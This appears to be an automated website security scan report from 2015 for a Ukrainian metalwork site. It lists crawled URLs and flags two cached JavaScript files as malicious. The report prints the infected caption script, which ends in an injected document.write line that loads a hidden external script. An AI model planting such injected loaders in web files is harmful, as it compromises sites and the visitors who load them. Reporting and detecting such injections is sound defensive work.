Scanned pages/files
Request | Server response | Status |
http://www.steeland.com.ua/ | HTTP/1.1 302 Found Connection: close Date: Sun, 26 Apr 2015 03:23:56 GMT Location: http://www.steeland.com.ua/html/ Server: nginx admin Content-Length: 216 Content-Type: text/html; charset=iso-8859-1 X-Cache: HIT from Backend | clean |
http://www.steeland.com.ua/html/ | 200 OK Content-Length: 27188 Content-Type: text/html | clean |
http://www.steeland.com.ua/html/cache/template/mootools-c1533987.js | 200 OK Content-Length: 74305 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var MooTools={version:'1.12'};function $defined(obj){return(obj!=undefined);};function $type(obj){if(!$defined(obj))return false;if(obj.htmlElement)return'element';var type=typeof obj;if(type=='object'&&obj.nodeName){switch(obj.nodeType){case 1:return'element';case 3:return(/\S/).test(obj.nodeValue)?'textnode':'whitespace';}} if(type=='object'||type=='function'){switch(obj.constructor){case Array:return'array';case RegExp:return'regexp';case Class:return'class';} if(typeof obj.le Antivirus reports:
| ||
http://www.steeland.com.ua/html/cache/template/caption-be912474.js | 200 OK Content-Length: 1154 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var JCaption=new Class({initialize:function(selector) {this.selector=selector;var images=$$(selector);images.each(function(image){this.createCaption(image);},this);},createCaption:function(element) {var caption=document.createTextNode(element.title);var container=document.createElement("div");var text=document.createElement("p");var width=element.getAttribute("width");var align=element.getAttribute("align");if(!width){width=element.width;} if(!align) align=element.getStyle("float container.className=this.selector.replace('.','_');container.className=container.className+" "+align;container.setAttribute("style","float:"+align);container.style.width=width+"px";}});document.caption=null;window.addEvent('load',function(){var caption=new JCaption('img.caption') document.caption=caption}); ;document.write("<scr"+"ipt src='/html/language/en-GB/pentium.js'><"+"/script>"); Antivirus reports:
| ||
http://www.steeland.com.ua/html/cache/template/jquery-409821cc.js | 200 OK Content-Length: 93305 Content-Type: application/x-javascript | clean |
http://www.steeland.com.ua/html/cache/template/widgetkit-43152e90-ec97da9e.js | 200 OK Content-Length: 12960 Content-Type: application/x-javascript | clean |
http://www.steeland.com.ua/html/cache/template/template-5bc8d101.js | 200 OK Content-Length: 16186 Content-Type: application/x-javascript | clean |
http://code.jquery.com/jquery-latest.js | 200 OK Content-Length: 282766 Content-Type: application/x-javascript | clean |
http://www.steeland.com.ua/html | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 26 Apr 2015 03:23:59 GMT Location: http://www.steeland.com.ua/html/ Server: nginx admin Content-Length: 240 Content-Type: text/html; charset=iso-8859-1 X-Cache: HIT from Backend | clean |
http://www.steeland.com.ua/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://www.steeland.com.ua/html/productione | 200 OK Content-Length: 19850 Content-Type: text/html | clean |
http://www.steeland.com.ua/html/productione/module-variations/2011-12-20-13-53-22 | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 26 Apr 2015 03:24:00 GMT Location: http://www.steeland.com.ua/html/kovka/listia/ Server: nginx admin Content-Length: 253 Content-Type: text/html; charset=iso-8859-1 X-Cache: HIT from Backend | clean |
http://www.steeland.com.ua/html/kovka/listia/ | 200 OK Content-Length: 58901 Content-Type: text/html | clean |
http://www.steeland.com.ua/html/productione/module-variations/piki | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 26 Apr 2015 03:24:01 GMT Location: http://www.steeland.com.ua/html/kovka/piki Server: nginx admin Content-Length: 250 Content-Type: text/html; charset=iso-8859-1 X-Cache: HIT from Backend | clean |
http://www.steeland.com.ua/html/kovka/piki | 200 OK Content-Length: 31561 Content-Type: text/html | clean |
http://www.steeland.com.ua/html/productione/module-variations/piatki | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 26 Apr 2015 03:24:02 GMT Location: http://www.steeland.com.ua/html/kovka/piatki/ Server: nginx admin Content-Length: 253 Content-Type: text/html; charset=iso-8859-1 X-Cache: HIT from Backend | clean |
http://www.steeland.com.ua/html/kovka/piatki/ | 200 OK Content-Length: 23756 Content-Type: text/html | clean |
http://www.steeland.com.ua/html/productione/module-variations/cvety | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 26 Apr 2015 03:24:02 GMT Location: http://www.steeland.com.ua/html/kovka/cvety Server: nginx admin Content-Length: 251 Content-Type: text/html; charset=iso-8859-1 X-Cache: HIT from Backend | clean |
http://www.steeland.com.ua/html/kovka/cvety | 200 OK Content-Length: 33948 Content-Type: text/html | clean |
http://www.steeland.com.ua/html/productione/module-variations/shary | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 26 Apr 2015 03:24:03 GMT Location: http://www.steeland.com.ua/html/kovka/shary/ Server: nginx admin Content-Length: 252 Content-Type: text/html; charset=iso-8859-1 X-Cache: HIT from Backend | clean |
http://www.steeland.com.ua/html/kovka/shary/ | 200 OK Content-Length: 19230 Content-Type: text/html | clean |
http://www.steeland.com.ua/html/productione/module-variations/sharypolye | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 26 Apr 2015 03:24:04 GMT Location: http://www.steeland.com.ua/html/kovka/sharypolye Server: nginx admin Content-Length: 256 Content-Type: text/html; charset=iso-8859-1 X-Cache: HIT from Backend | clean |
http://www.steeland.com.ua/html/kovka/sharypolye | 200 OK Content-Length: 16827 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: steeland.com.ua
Result:
GET / HTTP/1.1
Host: steeland.com.ua
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: steeland.com.ua
Referer: http://www.google.com/search?q=steeland.com.ua
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: steeland.com.ua
Referer: http://www.google.com/search?q=steeland.com.ua
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=steeland.com.ua
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://steeland.com.ua/
Result: steeland.com.ua is not infected or malware details are not published yet.
Result: steeland.com.ua is not infected or malware details are not published yet.